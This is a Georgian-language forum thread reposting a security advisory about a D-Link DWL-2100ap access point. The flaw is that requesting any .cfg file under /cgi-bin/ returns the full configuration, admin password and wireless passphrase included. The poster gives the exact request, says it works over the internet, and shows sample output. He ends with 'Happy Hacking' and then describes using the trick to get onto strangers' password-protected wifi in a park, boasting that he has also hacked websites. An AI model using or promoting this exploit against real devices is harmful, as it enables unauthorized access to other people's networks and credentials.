D-Link Access-Point, აბა ვტეხავ ყველა :D პარამეტრები

[Classical]

მოკლედ ვწერთ მისამართს თუ შიდა ქსელში ვართ 192.168.1.1 ან რა Ip range ც არის და როგორცაა მოკლედ და შემდეგ ვწერთ cgi-bin/Intruders.cfg (მაგალითად 192.168.1.1/cgi-bin/Intruders.cfg) ამას ხოდა გვიგდებს cfg ს რომელსაც გავხსნით cmd ში შემდეგნაირად სადაც შვინახეთ cfg მაგალითად cd desktop hit enter და edit Intruders.cfg შიგნით დაგვხვდება პაროლი და იუზერი. გლობალურზეც მუშაობს ანუ შიდა ქსელიდან მოთხოვნის გაგზავნა არ არის აუცილებელი.

პროგრამული კოდი

# ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)
# INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
# http://www.intruders.com.br/ , http://www.intruders.org.br/

Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found).
Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found).
However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will return all the device configuration.

For example, making the following request:

http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg

cfg ში დაგვხვდება ესეთი რაღაცა

პროგრამული კოდი

# Copyright © 2002 Atheros Communications, Inc., All Rights Reserved
# DO NOT EDIT -- This configuration file is automatically generated
magic Ar52xxAP
fwc: 34
login admin
DHCPServer
Eth_Acl
nameaddr
domainsuffix
IP_Addr 10.0.0.30
IP_Mask 255.0.0.0
Gateway_Addr 10.0.0.1
RADIUSaddr
RADIUSport 1812
RADIUSsecret
password ნუ რაც არის პაროლი ის იქნება აქ
passphrase
wlan1 passphrase AnewBadPassPhrase
# Several lines removed.

Happy Hacking

პოსტის უკანასკნელი ჩამსწორებელია Classical: Aug 1 2009, 09:41 PM

[Classical]

ჯერ ერთი უმრავლეს როუტერებს ერთი და იგივე პაროლი ადევს ყველას თუ მომხმარებელმა არ მოითხოვა მისი შეცვლა და მეორეც როუტერის დაკონფიგებას გატეხვა არ ქვია............ მესამეც ვაილესის პაროლი როუტერს აქ დამახსოვრებული მაგრამ მაგის გასაგებად
ამ როუტერის პატრონს უნდა ეწვიოთ და როგომე როუტერში უნდა შეხვიდეთ და მეოთხეც თუ შენ თვითონ გაქ ინტერნეტი სხვისი ინტერნეტის მოპარვას რა აზრი აქ...

რატომ ვითომ ? მე ეხლა მაქ პროვაიდერის მიერ დაყენებული როუტერი, მარა იქნებ Wireless მინდა და ვიყიდე D -Link Access-Point და დავაკონფიგე მე თვითონ დავადებ პაროლს და Default არაფერი არ იქნება. ისე მე როგორც ვიცი Wireless რაუტერებს ან Ap სხვა Pw ადევს. როუტერში შესვლა არ არის საჭირო არ გჭირდება შენ User name და Pw 192.168.1.1/cgi-bin/Intruders.cfg ჩაწერ ამას ბრაუზერში თუ ლოკალში ხარ თუ გლობალში შესაბამის Ip მისამართს და კონფიგში იქნება პაროლი ეს არის Ap ის ბუგი. აუცილებელი არაა Pw შეუცვალო. წარმოიდგინე სიტუაცია ზიხარ მაგალითად ვაკის პარკში და დაიჭირე Wireless ინტერნეტი პაროლით თუ აღმოჩნდა D link ap ამ ხერხით შეხვალ და უბრალოდ გამოიყენებ ინტერნეტს მეტი არაფერი. მე პირადად არანაირი მუღამი არ მაქ პაროები ვცვალო. ხშირად ყოფილა შემთხვევა საიტი გამიტეხავს და მერე არც გამხსენია მთავარი მუღამი გატეხვამდეა მერე უკვე ფეხებზე გკიდია.

რაც შეეხება არა სრულ მენიუს ეგეთი მაქ ნანახი Zyxel-ის მოდემებზე ანუ უპაროლოდ რომ შედიოდი მაშინ სისტემის ინფოს გაცემდა მარტო, ხოლო როცა პაროლით კონფიგიც ჩანდა
ისე ჩემი აზრით უპაროლოდ არც ინფოს არ უნგა გაჩვენებდეს

გეთანხმები ოთო.